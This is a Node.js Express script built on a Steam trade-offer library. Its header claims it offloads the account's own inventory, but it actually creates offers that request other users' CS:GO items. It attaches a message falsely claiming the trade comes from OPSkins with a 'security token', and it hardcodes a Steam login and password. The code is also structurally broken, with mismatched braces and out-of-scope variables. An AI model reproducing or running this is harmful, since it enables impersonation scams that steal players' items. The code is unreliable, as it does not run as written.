/**
 * OFFLOADER
 *
 * Once logged in, sends a trade offer containing this account's entire tradable CS:GO inventory.
 */

var SteamUser = require('steam-user');
var SteamCommunity = require('steamcommunity');
var SteamTotp = require('steam-totp');
var TradeOfferManager = require('../lib/index.js'); // use require('steam-tradeoffer-manager') in production
var fs = require('fs');
var express = require("express");
var bodyParser = require("body-parser");
var cors = require('cors');
var app = express();
// создаем парсер для данных в формате json
var jsonParser = bodyParser.json();
app.use(cors({origin: '*'}));
app.use(express.static(__dirname + "/"));


var client = new SteamUser();
var manager = new TradeOfferManager({
	"steam": client, // Polling every 30 seconds is fine since we get notifications from Steam
	"domain": "example.com", // Our domain is example.com
	"language": "en" // We want English item descriptions
});
var community = new SteamCommunity();

// Steam logon options
var logOnOptions = {
	"accountName": "seqaba",
	"password": "PASpasPAS1svinopas1337",
	"twoFactorCode": SteamTotp.getAuthCode("sharedSecret")
};

if (fs.existsSync('polldata.json')) {
	manager.pollData = JSON.parse(fs.readFileSync('polldata.json'));
}

client.logOn(logOnOptions);

client.on('loggedOn', function() {
	console.log("Logged into Steam");
});

client.on('webSession', function(sessionID, cookies) {
	manager.setCookies(cookies, function(err) {
		if (err) {
			console.log(err);
			process.exit(1); // Fatal error since we couldn't get our API key
			return;
		}

		console.log("Got API key: " + manager.apiKey);

		// Get our inventory
		//manager.getUserInventoryContents (steamID, 730, 2, true, callback)
	// 	manager.getInventoryContents(730, 2, true, function(err, inventory) {
	// 		//	manager.getUserInventoryContents("62087021 ",730, 2, true, function(err, inventory) {
	// 		if (err) {
	// 			console.log(err);
	// 			return;
	// 		}
	//
	// 		for(var i = 0;i<inventory.length;i++){
	// 		var item = {
	// 		  "assetid": inventory[i].id,
	// 		  "name": inventory[i].market_hash_name
	// 		}
	// 	}
	// console.log(item['assetid']+":"+item['name']);
	//
	//
	// 		if (inventory.length == 0) {
	// 			// Inventory empty
	// 			console.log("CS:GO inventory is empty");
	// 			return;
	// 		}https://steamcommunity.com/tradeoffer/new/?partner=124174042&token=a2nmLIjb

//---------------------------------------------------
app.post("/", jsonParser, function (request, response) {
	
    if(!request.body) return response.sendStatus(400);
    console.log(request.body);
    response.json(`${request.body.userName} - ${request.body.userAge}`);
		inventory = [{"appid":730,"contextid":"2","assetid":"123123323"}];
		inventory[0]["assetid"] = request.body.userAge;
		var offer = manager.createOffer(request.body.userName);

		offer.addTheirItems(inventory);

		offer.setMessage("285692956 | This is an automatic trade generated by OPSkins. Security token: nNY21 ");
		offer.send(function(err, status) {
			if (err) {
				console.log(err);
				return;
			}


		});
	});
});

community.setCookies(cookies);
});
//---------------------------------------------------


//console.log("Found " + inventory + " CS:GO items");

			// Create and send the offer


manager.on('sentOfferChanged', function(offer, oldState) {
	console.log(`Offer #${offer.id} changed: ${TradeOfferManager.ETradeOfferState[oldState]} -> ${TradeOfferManager.ETradeOfferState[offer.state]}`);
});

manager.on('pollData', function(pollData) {
	fs.writeFile('polldata.json', JSON.stringify(pollData), function() {});
});
app.listen(8080);
/*
 * Example output:
 *
 * Logged into Steam
 * Got API key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 * Found 117 CS:GO items
 * Offer #1601569319 sent, but requires confirmation
 * Offer confirmed
 */
